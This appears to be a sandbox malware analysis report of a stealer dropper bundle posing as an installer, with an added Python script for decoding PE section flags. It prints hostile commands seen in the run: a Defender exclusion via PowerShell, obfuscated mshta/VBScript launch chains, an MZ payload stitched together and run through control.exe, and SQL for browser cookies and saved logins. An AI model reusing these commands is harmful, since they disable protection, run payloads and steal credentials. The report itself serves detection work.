                  Source: libstdc++-6.dll.1.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libcurl.dll.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libcurlpp.dll.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libstdc++-6.dll.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Mon1785436ae78.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: libcurl.dll.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: libcurlpp.dll.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: libstdc++-6.dll.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: Mon1795d04d4bd.exe.1.dr Static PE information: Section: [$vdPf# ZLIB complexity 1.0008012820512822
                  Source: libcurl.dll.1.dr Static PE information: Section: .rdata ZLIB complexity 0.9936941964285714
                  Source: libcurl.dll.1.dr Static PE information: Section: .reloc ZLIB complexity 0.9967105263157895
                  Source: libcurlpp.dll.1.dr Static PE information: Section: /4 ZLIB complexity 1.002685546875
                  Source: libstdc++-6.dll.1.dr Static PE information: Section: /4 ZLIB complexity 0.9987349076704546
                  Source: libstdc++-6.dll.1.dr Static PE information: Section: .reloc ZLIB complexity 1.000146484375
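A reading note on the section lines above: the IMAGE_SCN_ALIGN_* names are not independent bits. Bits 20-23 of IMAGE_SECTION_HEADER.Characteristics hold one 4-bit alignment code (1 = 1 byte up to 14 = 8192 bytes; 0 unspecified, 15 reserved), and a listing that includes IMAGE_SCN_ALIGN_MASK indicates the whole field is set, a value no linker emits. The Windows loader ignores that field for image files, so it is a tampering indicator rather than a loader concern; the finding that matters for triage is IMAGE_SCN_MEM_WRITE together with IMAGE_SCN_MEM_EXECUTE on .text of libcurl.dll, libcurlpp.dll and libstdc++-6.dll (a code section the module can patch in place), alongside the non-zero size in the reserved 16th data directory slot on the same three files. The following is an added example, not Joe Sandbox code and not from the sample: it walks the section table of a PE image and decodes each Characteristics value the way a reviewer would. The minimal image it runs against and the .text value fed into it are constructed assumptions modelled on those lines; the dropped DLLs are not embedded here.

```python
"""Decode IMAGE_SECTION_HEADER.Characteristics the way a reviewer would.

Added example, not Joe Sandbox code and not from the sample. build_minimal_pe()
and the characteristics values fed to it are assumptions modelled on the
report's section lines.
"""
import struct

FLAG_NAMES = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x04000000: "IMAGE_SCN_MEM_NOT_CACHED",
    0x08000000: "IMAGE_SCN_MEM_NOT_PAGED",
    0x10000000: "IMAGE_SCN_MEM_SHARED",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
ALIGN_MASK = 0x00F00000  # bits 20-23: one 4-bit code, not fifteen independent flags


def alignment_bytes(chars: int):
    """Codes 1..14 encode 1 .. 8192 bytes; 0 (unspecified) and 15 (reserved) return None."""
    code = (chars & ALIGN_MASK) >> 20
    return 1 << (code - 1) if 1 <= code <= 14 else None


def decode(chars: int) -> dict:
    """Split a Characteristics DWORD into named flags plus the two findings worth triaging."""
    code = (chars & ALIGN_MASK) >> 20
    return {
        "flags": [name for bit, name in FLAG_NAMES.items() if chars & bit],
        "alignment": alignment_bytes(chars),
        "alignment_reserved": code == 15,
        "writable_code": bool(chars & 0x20000000) and bool(chars & 0x80000000),
    }


def section_characteristics(pe: bytes) -> dict:
    """Walk the section table of a PE image and return {section name: Characteristics}."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size   # 4-byte signature + 20-byte COFF header + optional header
    out = {}
    for i in range(num_sections):
        off = table + i * 40           # IMAGE_SECTION_HEADER is 40 bytes; Characteristics at +36
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        out[name] = struct.unpack_from("<I", pe, off + 36)[0]
    return out


def triage(pe: bytes) -> dict:
    """{section name: decoded characteristics} for every section in the image."""
    return {name: decode(ch) for name, ch in section_characteristics(pe).items()}


def build_minimal_pe(sections) -> bytes:
    """Constructed stand-in image: DOS header, PE signature, COFF header, zeroed PE32 optional header, section table."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = b"\0" * 0xE0                 # PE32 optional header size; contents are irrelevant here
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x2102)
    table = b"".join(name.encode("latin-1").ljust(8, b"\0") + b"\0" * 28 + struct.pack("<I", ch)
                     for name, ch in sections)
    return dos + b"PE\0\0" + coff + opt + table


# Assumed values modelled on the report: .text carrying CODE|INITIALIZED_DATA, alignment code 0xF
# and EXECUTE|READ|WRITE; .reloc as a linker would normally emit it.
SUSPECT_TEXT = 0x00000020 | 0x00000040 | 0x00F00000 | 0x20000000 | 0x40000000 | 0x80000000
NORMAL_RELOC = 0x00000040 | 0x02000000 | 0x40000000
SAMPLE_IMAGE = build_minimal_pe([(".text", SUSPECT_TEXT), (".reloc", NORMAL_RELOC)])
```

To run it against the dropped files rather than the constructed image, pass `open(path, "rb").read()` to `triage()`; any section with `writable_code` set, or `alignment_reserved` set, deserves a look before the module is trusted as a plain libcurl build.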
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, LocatorAPI.cs Suspicious URL: 'http://7hni.kamisime.ru/'
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, LocatorAPI.cs Suspicious URL: 'http://4tfdv6.rafilda.ru/'
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@94/64@66/13
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Code function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Code function: 0_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404983
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Code function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe Code function: 19_2_00007FF72F5C18F0 FindResourceW,SizeofResource,LoadResource,LockResource,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SleepEx,19_2_00007FF72F5C18F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Mon17eac6d534bfd22c7.exe.log
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8076
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7700
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2740:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4544
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe File created: C:\Users\user\AppData\Local\Temp\nst1649.tmp
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Mon17e1fac3fd3d84b.exe")
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe ReversingLabs: Detection: 71%
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Virustotal: Detection: 68%
                  Source: setup_install.exe String found in binary or memory: -stop
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe File read: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                  Source: unknown Process created: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe Process created: C:\Users\user\AppData\Local\Temp\setup_installer.exe "C:\Users\user\AppData\Local\Temp\setup_installer.exe"
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixone
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Mon17eac6d534bfd22c7.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon179e1058f256.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon178817e243.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe Mon17742f90b916675f2.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe Mon17c604381c7047e.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe Mon17e1fac3fd3d84b.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe Mon178817e243.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe Mon17b5f403be4d8d6b.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe Mon17f45359eb9.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Mon17948100733a95c58.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Mon1785436ae78.exe /mixone
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe Mon1795d04d4bd.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe Mon179e1058f256.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 980
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 12
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\09xU.exE 9xU.EXE -pPtzyIkqLZoCarb5ew
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exE Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 864
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exE Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
